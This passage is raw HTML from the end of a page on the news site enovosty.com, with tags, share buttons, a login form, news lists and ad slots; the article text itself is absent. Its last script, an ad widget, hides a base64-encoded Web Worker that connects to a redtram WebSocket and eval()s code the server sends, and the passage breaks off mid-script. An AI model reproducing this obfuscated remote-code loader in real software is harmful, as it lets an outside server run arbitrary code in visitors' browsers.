href="/10573-aleksandr-karpec"><img src="/wp-content/themes/eizvestia/img/Karpets.jpg" alt="Александр Карпец" title="Александр Карпец"></a><div id="posttags" style="margin:10px 0;">ТЕГИ: <a href="https://enovosty.com/tag/bortnikov" rel="tag">Бортников</a>, <a href="https://enovosty.com/tag/vajno" rel="tag">Вайно</a>, <a href="https://enovosty.com/tag/zolotov" rel="tag">Золотов</a>, <a href="https://enovosty.com/tag/kgb" rel="tag">КГБ</a>, <a href="https://enovosty.com/tag/kovalchuk" rel="tag">Ковальчук</a>, <a href="https://enovosty.com/tag/moskva" rel="tag">Москва</a>, <a href="https://enovosty.com/tag/naryshkin" rel="tag">Нарышкин</a>, <a href="https://enovosty.com/tag/okruzhenie-putina" rel="tag">Окружение Путина</a>, <a href="https://enovosty.com/tag/patrushev" rel="tag">Патрушев</a>, <a href="https://enovosty.com/tag/preemnik-putina" rel="tag">преемник Путина</a>, <a href="https://enovosty.com/tag/putin" rel="tag">Путин</a>, <a href="https://enovosty.com/tag/rossiya" rel="tag">Россия</a>, <a href="https://enovosty.com/tag/sergej-ivanov" rel="tag">Сергей Иванов</a></div><div class="voteBox" > </div><br /><p style="color: #a3a3a3;font-size:12px;padding: 0;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">8</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%9A%D0%BE%D0%BB%D0%BB%D0%B5%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D1%8B%D0%B9+%D0%9F%D1%83%D1%82%D0%B8%D0%BD+%D0%B8+%D0%B5%D0%B3%D0%BE+%D1%81%D0%BE%D1%81%D1%82%D0%B0%D0%B2%D0%BD%D1%8B%D0%B5+%D1%87%D0%B0%D1%81%D1%82%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%9A%D0%BE%D0%BB%D0%BB%D0%B5%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D1%8B%D0%B9+%D0%9F%D1%83%D1%82%D0%B8%D0%BD+%D0%B8+%D0%B5%D0%B3%D0%BE+%D1%81%D0%BE%D1%81%D1%82%D0%B0%D0%B2%D0%BD%D1%8B%D0%B5+%D1%87%D0%B0%D1%81%D1%82%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4805539" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:0;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="7c5abd98fe" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script> </div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px; float:left;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><div id='div-gpt-ad-1531304104065-0' style='height:600px; width:300px; float:right;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531304104065-0'); });</script></div><br style="clear:both;"><br /> <div class="wiget simple_pr" style="border-left:none; border-right:none;" id="theme_posts"> <div class="caption "> <p>Политические новости</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '23,2712', 2712, 10)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '23,2712', 2712, 10)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '23,2712', 2712, 10)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/politika/full/1405-taras-chornovil-glaza-putina-na-samom-dele-mogut-okazatsya-ognyami-vstrechnogo-poezda">Тарас Чорновил: «Глаза Путина» на самом деле могут оказаться огнями встречного поезда (8193)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1905-prodlyat-li-karantin-posle-22-maya-v-ukraine-chetkoe-poyasnenie">Продлят ли карантин после 22 мая в Украине: Четкое пояснение (7308)</a></h3><h3 class="press"><a href="https://enovosty.com/politika/full/1305-taras-chornovil-mvf-ne-ponimaet-chto-takoe-papik-i-pochemu-oni-dolzhny-davat-kredit-strane-v-kotoroj-sushhestvuyut-papiki">Тарас Чорновил: МВФ не понимает, что такое «папик» и почему они должны давать кредит стране, в которой существуют «папики» (5447)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1805-porazhenie-i-poterya-lica-rossijskij-analitik-rasskazal-o-proigryshe-kremlya-na-donbasse">"Поражение и потеря лица": Российский аналитик рассказал о проигрыше Кремля на Донбассе (2261)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1305-vojna-na-donbasse-ukraincy-razgromno-udarili-po-boevikam">Война на Донбассе: Украинцы разгромно ударили по боевикам (1177)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1805-sovetnika-venediktovoj-obvinili-v-slive-obyskov-sbu-verlanova-i-kostyuka-smi">Советника Венедиктовой обвинили в «сливе» обысков СБУ Верланова и Костюка – СМИ (466)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1905-stalo-izvestno-kogda-ukraina-planiruet-zapustit-aviaperelety-za-granicu">Стало известно, когда Украина планирует запустить авиаперелеты за границу (441)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1305-chtoby-ukraina-vstupila-v-nato-nuzhno-dumat-kak-zakryvat-ili-zamorazhivat-konflikt-na-vostoke-kapitonenko">Чтобы Украина вступила в НАТО нужно думать, как закрывать или замораживать конфликт на Востоке, - Капитоненко (410)</a></h3><h3 class="press"><a href="https://enovosty.com/politika/full/1905-kollektivnyj-putin-i-ego-sostavnye-chasti">Коллективный Путин и его составные части (365)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1505-ot-ofisa-genprokurora-gbr-kuriruet-zyat-top-menedzhera-kurchenko-smi">От Офиса Генпрокурора ГБР "курирует" зять топ-менеджера Курченко — СМИ (355)</a></h3></div> </div> <br /> <!--<script type='text/javascript'>admixerML.fn.push(function() {admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph: 'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script>--><div id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069' style="margin:0 auto"></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script> <div class="bannerB" style="margin:0px 0 10px 100px;" ><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block;margin:10px auto;width:468px;height:60px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="1931703904"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script></div><br /><div id="pop_video" style="margin:10px 0;clear: both;"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="8"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_kiev/full/1605-pod-kievom-razorivshijsya-fermer-vybrosil-gory-morkovi-video"><img width="137" height="85" alt="Под Киевом разорившийся фермер выбросил горы моркови" src="https://enovosty.com/wp-content/uploads/2020/05/image_810xs-6.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_kiev/full/1605-pod-kievom-razorivshijsya-fermer-vybrosil-gory-morkovi-video">Под Киевом разорившийся фермер выбросил горы моркови</a></div></td><td class="photo "><div class="aimg"><a class="title" href="https://enovosty.com/news_society/full/1805-v-elitnom-nochnom-klube-kieva-otkazalis-ot-karantina-i-nachali-massovo-priimat-posetitelej-foto-video">В элитном ночном клубе Киева отказались от карантина и начали массово принимать посетителей</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_incidents/full/1605-v-brazilii-zafiksirovali-padenii-nlo-k-mestu-incidenta-pribyli-voennye-video"><img width="137" height="85" alt="В Бразилии зафиксировали падение НЛО. К месту инцидента прибыли военные" src="https://enovosty.com/wp-content/uploads/2020/05/nlo.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/1605-v-brazilii-zafiksirovali-padenii-nlo-k-mestu-incidenta-pribyli-voennye-video">В Бразилии зафиксировали падение НЛО. К месту инцидента прибыли военные</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1905-v-livii-tureckij-dron-unichtozhil-rossijskij-kompleks-krasuxa-video"><img width="137" height="85" alt="В Ливии турецкий дрон уничтожил российский комплекс «Красуха»" src="https://enovosty.com/wp-content/uploads/2020/05/screenshot_21-4.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1905-v-livii-tureckij-dron-unichtozhil-rossijskij-kompleks-krasuxa-video">В Ливии турецкий дрон уничтожил российский комплекс «Красуха»</a></div></td></tr><tr><td class="view"><span><i></i>32407</span></td><td class="view"><span><i></i>4846</span></td><td class="view"><span><i></i>4456</span></td><td class="view last"><span><i></i>4303</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/topvideo1/full/1705-kto-prodaet-lichnye-dannye-ukraincev-v-socseti-telegram-i-chto-moshenniki-mogut-sdelat-s-vashim-pasportom-i-pravami-video"><img width="137" height="85" alt="Кто продает личные данные украинцев в соцсети Telegram и что мошенники могут сделать с вашим паспортом и правами? " src="https://enovosty.com/wp-content/uploads/2020/05/telegramm888.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/topvideo1/full/1705-kto-prodaet-lichnye-dannye-ukraincev-v-socseti-telegram-i-chto-moshenniki-mogut-sdelat-s-vashim-pasportom-i-pravami-video">Кто продает личные данные украинцев в соцсети Telegram и что мошенники могут сделать с вашим паспортом и правами? </a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/1805-na-zhitomirshhine-zagadochnyj-straus-gonyalsya-za-za-velosipedistom-video"><img width="137" height="85" alt="На Житомирщине загадочный страус гонялся за велосипедистом" src="https://enovosty.com/wp-content/uploads/2020/05/619adb03f2c101ec95fe38d66a914d64.jpeg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/1805-na-zhitomirshhine-zagadochnyj-straus-gonyalsya-za-za-velosipedistom-video">На Житомирщине загадочный страус гонялся за велосипедистом</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1305-v-ssha-proxodyat-ispytaniya-innovacionnogo-vertoleta-sb1-defiant-video"><img width="137" height="85" alt="В США проходят испытания инновационного вертолета SB>1 Defiant" src="https://enovosty.com/wp-content/uploads/2020/05/sikorsky–boeing_sb-1_defiant-750x500.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1305-v-ssha-proxodyat-ispytaniya-innovacionnogo-vertoleta-sb1-defiant-video">В США проходят испытания инновационного вертолета SB>1 Defiant</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1805-v-rf-tolpa-silovikov-ustroila-pogonyu-za-sportsmenom-epichnoe-video"><img width="137" height="85" alt="В РФ толпа силовиков устроила погоню за спортсменом. Эпичное ВИДЕО" src="https://enovosty.com/wp-content/uploads/2020/05/pobeg.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1805-v-rf-tolpa-silovikov-ustroila-pogonyu-za-sportsmenom-epichnoe-video">В РФ толпа силовиков устроила погоню за спортсменом. Эпичное ВИДЕО</a></div></td></tr><tr><td class="view"><span><i></i>4119</span></td><td class="view"><span><i></i>2340</span></td><td class="view"><span><i></i>2273</span></td><td class="view last"><span><i></i>1445</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1905-v-rossii-razbilsya-voennyj-vertolet-mi-8" rel="bookmark">В России разбился военный вертолет Ми-8</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1905-otnosheniya-rossii-i-kitaya-pravda-vyshla-naruzhu-piontkovskij" rel="bookmark">Отношения России и Китая: правда вышла наружу, - Пионтковский</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1905-voennyj-ekspert-rasskazal-kak-rossiya-voplotila-v-zhizn-svoj-samyj-strashnyj-son" rel="bookmark">Военный эксперт рассказал, как Россия воплотила в жизнь свой самый страшный сон</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/1805-polsha-povernula-ventil-tranzit-rossijskogo-gaza-v-germaniyu-moshhno-ruxnul" rel="bookmark">Польша повернула вентиль: Транзит российского газа в Германию мощно рухнул</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1805-xochet-obnulitsya-kak-i-zachem-putin-falsificiruet-statistiku-i-speshit-pokonchit-s-karantinom" rel="bookmark">Хочет обнулиться: Как и зачем Путин фальсифицирует статистику и спешит покончить с карантином</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_politics/full/1805-porazhenie-i-poterya-lica-rossijskij-analitik-rasskazal-o-proigryshe-kremlya-na-donbasse" rel="bookmark">"Поражение и потеря лица": Российский аналитик рассказал о проигрыше Кремля на Донбассе</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1605-putin-glava-krupnoj-mafioznoj-struktury-alfred-kox" rel="bookmark">Путин – глава крупной мафиозной структуры, - Альфред Кох</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1505-mezhdu-avtoritetnymi-amerikanskimi-smi-i-moskvoj-razvyazalas-vojna-v-chyom-sut" rel="bookmark">Между авторитетными американскими СМИ и Москвой развязалась война. В чём суть?</a><br /></td> </tr><tr></tr></table></div> <div class="wiget simple_pr" style="border-left:none; border-right:none;" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_politics/full/1905-prodlyat-li-karantin-posle-22-maya-v-ukraine-chetkoe-poyasnenie">Продлят ли карантин после 22 мая в Украине: Четкое пояснение (7301)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1905-v-livii-tureckij-dron-unichtozhil-rossijskij-kompleks-krasuxa-video">В Ливии турецкий дрон уничтожил российский комплекс «Красуха» (ВИДЕО) (4252)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1905-putin-slabovat-v-rossii-sdelali-prognoz-kto-mozhet-zaxvatit-vlast-v-strane">Путин слабоват: В России сделали прогноз, кто может захватить власть в стране (4080)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1905-sbu-oficialno-prokommentirovala-skandalnye-intervyu-gordona">СБУ официально прокомментировала скандальные интервью Гордона (2090)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/1905-kompaniya-kia-poxvastalas-novenkim-xot-xetchem-cerato-gt-chem-udivit-model-foto">Компания Kia похвасталась новеньким хот-хэтчем Cerato GT: чем удивит модель (ФОТО) (1952)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1905-voennyj-ekspert-rasskazal-kak-rossiya-voplotila-v-zhizn-svoj-samyj-strashnyj-son">Военный эксперт рассказал, как Россия воплотила в жизнь свой самый страшный сон (1782)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1905-novyj-skandal-v-ssha-novoe-dno-probito-trampom-ponomar">"Новый скандал в США, новое дно пробито Трампом", - Пономарь (1746)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1905-gordon-sdelal-neozhidannoe-zayavlenie-ob-intervyu-s-girkinym-socseti-zakipeli">Гордон сделал неожиданное заявление об интервью с Гиркиным. Соцсети "закипели" (1535)</a></p><p class="press"><a href="https://enovosty.com/uk/news-auto-ukr/full/1905-na-prodazh-vistavili-suzuki-samurai-yakij-viglyadaye-yak-legendarnij-gelik-foto">На продаж виставили Suzuki Samurai, який виглядає як легендарний “Гелік” (ФОТО) (1453)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/1905-specnaz-ssha-gotovitsya-poluchit-innovacionnye-strelkovye-kompleksy">Спецназ США готовится получить инновационные стрелковые комплексы (1301)</a></p></div> </div> <div class="bannerB" style="margin:10px 0 10px 100px;" ><div id="phoenix57768bd94f32fe17ccf62bcd"></div> <script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57768bd94f32fe17ccf62bcd";</script> <script src="//phoenix-widget.com/static/js/jsonp.js"></script></div>   </div><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/2104-uroki-torgovyx-rassledovanij-ot-minekonomrazvitiya-i-pochemu-private-eto-ne-privat">Уроки торговых расследований от Минэкономразвития – и почему Private это не Приват</a></p><p class="press"><a href="https://enovosty.com/publications/full/1304-revansh-monopolistov-igornogo-rynka-kak-finansovyj-komitet-ugodil-loterejshhikam">Реванш монополистов игорного рынка: как финансовый комитет угодил лотерейщикам</a></p></div><div id='div-2'><script type='text/javascript'>googletag.cmd.push(function() {googletag.display('div-2');});</script></div><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/2901-publichni-zakupivli-nareshti-prozzoro-chi-toj-zhe-ruchnyak"><img alt="Публічні закупівлі: нарешті «prozzoro» чи той же «ручняк»?" src="https://enovosty.com/wp-content/uploads/2020/01/pavlichenko-101x112.jpg"><div>Данило Павличенко</div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/2901-publichni-zakupivli-nareshti-prozzoro-chi-toj-zhe-ruchnyak">Публічні закупівлі: нарешті «prozzoro» чи той же «ручняк»?</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/2901-publichni-zakupivli-nareshti-prozzoro-chi-toj-zhe-ruchnyak"> В кінці 2019 року в Законі «Про публічні закупівлі» прийняли зміни (законопроект №1076), які вступлять в силу у квітні 2020 року. Гасла до його прийняття ...</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_kiev/full/1605-pod-kievom-razorivshijsya-fermer-vybrosil-gory-morkovi-video">Под Киевом разорившийся фермер выбросил горы моркови (ВИДЕО) (32407)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/1605-kak-pravilno-nejtralizovat-kleshha-instrukciya-ot-doktora-komarovskogo">Как правильно нейтрализовать клеща: инструкция от доктора Комаровского (8194)</a></p><p class="press"><a href="https://enovosty.com/politika/full/1405-taras-chornovil-glaza-putina-na-samom-dele-mogut-okazatsya-ognyami-vstrechnogo-poezda">Тарас Чорновил: «Глаза Путина» на самом деле могут оказаться огнями встречного поезда (8192)</a></p></div></div></div><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div><br><div><a href="https://enovosty.com/politika/full/705-treugolnik-smerti-ssha-kitaj-i-rossiya-gotovyatsya-k-tretej-mirovoj" target="_blank"><img alt="Нефтяной потоп" src="https://enovosty.com/wp-content/uploads/2020/05/tretya_mirovaya.jpg"></a></div><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
